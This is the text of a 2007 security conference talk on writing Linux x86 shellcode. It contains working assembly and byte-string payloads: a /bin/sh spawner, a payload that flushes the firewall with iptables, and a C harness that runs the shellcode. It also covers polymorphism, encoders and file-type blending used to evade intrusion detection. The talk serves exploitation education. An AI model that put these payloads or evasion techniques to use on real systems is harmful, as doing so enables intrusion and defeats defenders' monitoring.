Shellcoding 101

by datagramdatagram.layerone@gmail.com

LayerOne 2007

char shellcode[]=

“\x31\xdb”“\xf7\xe3”“\x66\x68”“\x21\x0a”“\x68\x64”“\x65\x65”“\x73\x68\x74\x74\x65\x6e”“\x68\x6e\x65\x20\x41\x68”“\x79\x65\x72\x4f\x68\x6f”“\x20\x4c\x61\x68\x48\x65”“\x6c\x6c\xb0\x04\x43\x89” “\xe1\xb2” “\x1a\xcd” “\x80\x31” “\xc0\x40” “\xcd\x80”;int main(void){void (*sh)()=(void *)&shellcode;sh();return 0;}

About Me

• Mild mannered Sys. Admin

• C, C++, Python, ASM, etc programmer

• Spoke at L1, Defcon, & Toorcon in 2006

• After hours crime fighter/superhero

What is Shellcode?

• Traditionally: shell spawning code

• Now: synonymous with “payload”

• Single segment assembly code• Post-EIP hijacking execution

Why Targeted Shellcode?

• /bin/sh does offer most flexibility

• Flexibility is unnecessary • Smaller memory footprint• “Less obvious” footprint

• Shell isn’t always best/easiest solution

The Enemies• NIDS

– Static/signature analysis• HIDS

– Daemon baselines (syscalls, file access, etc)

• IPS– Sandboxing

• System Customization• Protocol Restrictions

– Buffer size– Character/op-code

restrictions

Basic Shellcode

• Single segment• No null/restricted bytes

• Load data into ASM registers/stack• Call kernel software interrupt

Linux System Calls• Software level Kernel interrupt

– int 0x80 (\xcd\x80)

• Basic format:– eax: syscall #– ebx, ecx, edx, stack, etc: everything else

• man 2 <syscall>• /usr/include/asm/unistd.h

Linux System Calls• exit(0);

– exit(int status);

– eax: sycall number (0x01)– ebx: return value

xor eax, eax ; zero out eaxmov ebx, eax ; copy 0 to ebxinc eax ; set eax to 1int 0x80 ; call kernel

Writing to the Console• write(1, &shellcode, 26);

• eax = syscall 4• ebx = output (stdout = 1)• ecx = string address• edx = string length

• exit(0) afterwards optional(no seg faults == good)

xor ecx, ecxmul ecxpush word 0x0a21 ; push stringpush 0x73656564 ; to stack inpush 0x6e657474 ; reversepush 0x4120656epush 0x4f726579push 0x614c206fpush 0x6c6c6548mov al, 0x04 ; syscall = 4inc ebx ; stdout = 1mov ecx, esp ; address = espmov dl, 0x1a ; length = 26int 0x80 ; call kernel

Compiling in C• Simple template:

char shellcode[] = “\xde\xad\xbe\xef”; // big endian!

int main(void){int *ret;ret = (int *)&ret; (*ret) = (int) &shellcode;return 0;

}

• Change (int *)&ret to begin at different offsets

Spawning a Shell• execve(‘/bin/sh’, [‘/bin/sh’], NULL);

– execve(const char *path, char *const argv[], char *const envp[]);

xor ecx, ecx ; clear ecxpush ecx ; push NULLpush 0x68732f2f ; push ‘//sh’push 0x6e69622f ; push ‘/bin’mov ebx, esp ; *path to ebxpush ecx ; push NULLpush ebx ; push [‘/bin//sh, NULL’]mov ecx, esp ; argv[] to ecxxor edx, edx ; edx NULL (envp)mov al, 0x0b ; syscall 11int 0x80 ; call kernel

• Can be optimized by a few bytes…how?

Another Example• /sbin/iptables –F

– execve(“/sbin/iptables”,[“/sbin/iptables”, “-F”], NULL);

• What is missing from this?– How to solve?

push 0x0bpop eax ; syscall 11cdq ; xor edxpush edxpush word 0x462d ; push ‘-F’mov ecx, esppush edxpush word 0x7365 ; push ‘es’push 0x6c626174 ; push ‘tabl’push 0x70692f6e ; push ‘n/ip’push 0x6962732f ; push ‘/sbi’mov ebx, esp ; *pathpush edxpush ecxpush ebxmov ecx, esp ; argv[]int 0x80

Advanced Shellcoding

• ASCII/Op-code Restrictions• Polymorphism• Encoding• File Obfuscation/“Blending”• Anti-System Customization

ASCII/Opcode Restrictions• ASCII only: 0x21 – 0x7f

– UTF-8 safe: 0x7f max

• Buffer/data manipulation:– tolower(), toupper(), “stack clearing,” etc

• tolower() safe: NO 0x41 - 0x5a• toupper() safe: NO 0x61 - 0x7a

• Protocol Restrictions– EOL/EOF characters, etc

• Dissembler ( http://phiral.com )

Polymorphism vs. Encoding

• Polymorphism != Encoding

• All different:– Polymorphism– Encoders– Polymorphic Shellcode Encoders

Polymorphism

• Ability of shellcode to exist in “many forms”

• Complex! Hard to automate efficiently.

• 3 General Areas:– Instruction usage– Instruction order– NOP padding

Instruction Usage

• Extremely flexible

• Examples:– mov eax, 0x00 == xor eax, eax– mov al, 0x01 == push byte 0x01; pop eax

xor eax, eax; inc eax– xor ax, ax == and ax, 0x1110; and ax, 0x0001

Instruction Order• Simple and effective

– Avoid jmp/call tricks (easy to fingerprint*)

• Earlier write() as an example:xor ecx, ecxmul ecxpush word 0x0a21push 0x73656564push 0x6e657474push 0x4120656epush 0x4f726579push 0x614c206fpush 0x6c6c6548xor eax, eaxmov al, 0x04inc ebxxor ecx, ecxmov ecx, espmov dl, 0x1aint 0x80

xor eax, eaxpush word 0x0a21xor ecx, ecxpush 0x73656564push 0x6e657474mul ecxpush 0x4120656emov al, 0x04inc ebxpush 0x4f726579push 0x614c206fmov dl, 0x1apush 0x6c6c6548mov ecx, espint 0x80

NOP Padding• Randomly insert NOPs

• More than NOP (\x90)!

• “dead” registers especially useful

• Prominent NIDS signature method

exit(0);

mov ecx, esp ;*nop ;*xor eax, eaxpush 0xA20F935 ;*inc eaxdec ebx ;*mov ebx, eaxxor ecx, ecx ;*int 0x80

Polymorphism Example• Madwifi-ng Remote BoF

– exploit by Lorcon

• Essentially:– write()– exit()

• Could be improved:– jmp/call

• easy to fingerprint• sometimes size inefficient

– Many XORs, optimizable

jmp short 0x14pop ecxxor ebx, ebxxor edx, edxmov dl, 0x1bxor eax,eaxmov [ecx+edx], almov al, 0x04int 0x80mov al, 0x01int 0x80call -0x18db "Stop sniffing our network!!“

Polymorphism Example; Original: 53 bytes

jmp short 0x14pop ecx

xor ebx, ebxxor edx, edxmov dl, 0x1bxor eax,eaxmov [ecx+edx], almov al, 0x04int 0x80mov al, 0x01int 0x80

call -0x18db "Stop sniffing our network!!“

; New: 42 bytes base, w/ NOPs:; push dword is +1 byte (0x0a); more flexible*

mov ecx, 0x54832219push 0x0a21216bxor ecx, ecxmul ecxinc eaxmov al, 0x04push 0x726f7774push 0x656e2072xor ebx,ebxpush 0x756f2067mov bl, 0x01push 0x6e696666push 0x696e7320mov dl, 0x1cpush 0x706f7453mov ecx, espint 0x80mov al, 0x01push word 0x4146int 0x80

Encoders

• Decode shellcode on stack• Jump to and execute

• Easier than polymorphism

• Useful for toupper(), tolower() evasion

Encoderspushl $0x81cee28a ; push shellcode topushl $0x54530cb1 ; stack in reversepushl $0xe48a6f6a pushl $0x63306901pushl $0x69743069pushl $0x14popl %ecx ; ecx = 20, shellcode length

_unpack_loop: ; decoding loop (simple...though effective)decb (%esp, %ecx, 1)decl %ecxjns _unpack_loop

incl %ecx ; ecx 0 (-1 after loop)mul %ecxpush %esp

Polymorphic Shellcode Encoders

• Encoders with ‘polymorphic features’• Generally automated

• Ex: Shikata Ga Nai, CLET, ADMutate

• Vlad902’s research synopsis:– They all suck :/

Shellcode Blending• Spoofing filetypes

$ echo -e '\x44\x4f\x53\x00' > shell.bin && file shell.binshell.bin: Amiga DOS disk$ echo -e '\xc5\xc6\xcb\xc3' > shell.bin && file shell.binshell.bin: RISC OS Chunk data

• /etc/file/magic (FC6: /usr/lib/rpm/magic)• man 1 file• man 5 magic

Blending Example• Zip Header: PK\x03\x04 (byte 5 is variable)

db 0x50 ; push eaxdb 0x4b ; dec ebxdb 0x03,0x04,0x14 ; add eax, [esp+edx]

--Continue with shellcode--

• Account for modified registers• Don’t start on ‘bad’ opcodes! (jmp, call, ret, etc)

Anti-System Customization

• “Smart” shellcode– /bin/bash –c “\`which iptables\` -F”

• Non-standard shell detection– http://tty64.org

• Depends on level of information

Resources• Books

– Shellcoder's Handbook, by Koziol, Litchfield, Aitel, Anley, et al.– Hacking: The Art of Exploitation, by Erickson.– The 8088 and 8086 Microprocessors, by Treibel & Singh

• Sites– Milw0rm.com– Shellcode.org

• Supplementary:– Linkers and Loaders, by Levine– Memory as a Programming Concept in C/C++, by Franek– Research of overflows and general exploitation

Questions?

Thanks

• L1 Staff!• Vlad902, Polymorphic encoders research

– http://www.metasploit.com• Itzik Kotler, Blended shellcode research

– http://www.tty64.org• LORCON, Madwifi exploit payload

– http://802.11ninja.net